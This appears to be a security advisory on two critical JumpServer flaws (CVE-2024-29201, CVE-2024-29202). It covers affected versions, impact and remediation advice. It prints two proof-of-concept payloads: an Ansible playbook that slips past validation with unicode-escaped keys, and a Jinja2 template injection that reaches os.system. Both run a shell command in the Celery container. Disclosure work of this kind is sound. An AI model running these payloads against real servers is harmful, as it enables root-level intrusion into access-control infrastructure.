CVE-2024-29201 & CVE-2024-29202 Flaws Expose JumpServer Users to RCE Attacks

JumpServer, a popular open-source bastion host system, has recently been found to contain two critical vulnerabilities (CVE-2024-29201 and CVE-2024-29202) that could allow attackers to execute arbitrary code remotely. These vulnerabilities pose a severe risk to organizations that rely on JumpServer for their security infrastructure.

Understanding the Vulnerabilities

• CVE-2024-29201: This vulnerability lies within JumpServer’s Ansible playbook validation process. Attackers can bypass input validation mechanisms and inject malicious code into Ansible playbooks, which then executes within JumpServer’s Celery container with root privileges.

The exploitation process was disturbingly straightforward:

1. The attacker constructs a malicious playbook template within the “Job > Template” section of the Workbench, like the following YAML code:

   [{
        "name": "RCE playbook",
        "hosts": "all",
        "tasks": [
          {
            "name": "this runs in Celery container",
            "shell": "id > /tmp/pwnd",
            "\u0064elegate_to": "localhost"
   } ],
        "vars": {
        "ansible_\u0063onnection": "local"
        }
   }]
2. The attacker creates a job with this playbook and adds at least one asset to run the job.
3. The attacker successfully creates the file /tmp/pwnd in the Celery container.

• CVE-2024-29202: This vulnerability stems from a Jinja2 template injection flaw in JumpServer’s Ansible module. By crafting malicious Ansible Playbook templates, attackers can execute arbitrary code within the Celery container.

The simplicity of the attack mechanism underscored the vulnerability’s severity:

1. The attacker constructs a malicious playbook template within the “Job > Template” section of the Workbench, like the following YAML code:

   - name: |
          {% for x in ().__class__.__base__.__subclasses__() %}
            {% if "warning" in x.__name__ %}
              {{
                x()._module.__builtins__["__import__"]("os").system("id > /tmp/pwnd")
              }}
            {%endif%}
          {%endfor%}

2. The attacker creates a job by running the malicious playbook template within the “Job > Job list” section of the Workbench.

3. The attacker successfully creates the file /tmp/pwnd in the Celery container.

Potential Impact

Both vulnerabilities carry a “Critical” CVSS score of 10. Successful exploitation could allow attackers to:

• Steal sensitive data from connected hosts
• Manipulate databases that JumpServer has access to
• Potentially gain further access to the organization’s network

Affected Versions

The vulnerabilities impact JumpServer versions v3.0.0 through v3.10.6.

Recommendations

JumpServer users are strongly advised to take the following actions:

• Upgrade to v3.10.7: Patched versions are available and should be applied immediately.
• Temporary Workaround: If upgrading immediately is not possible, consider disabling JumpServer’s Job Center feature as a temporary mitigation.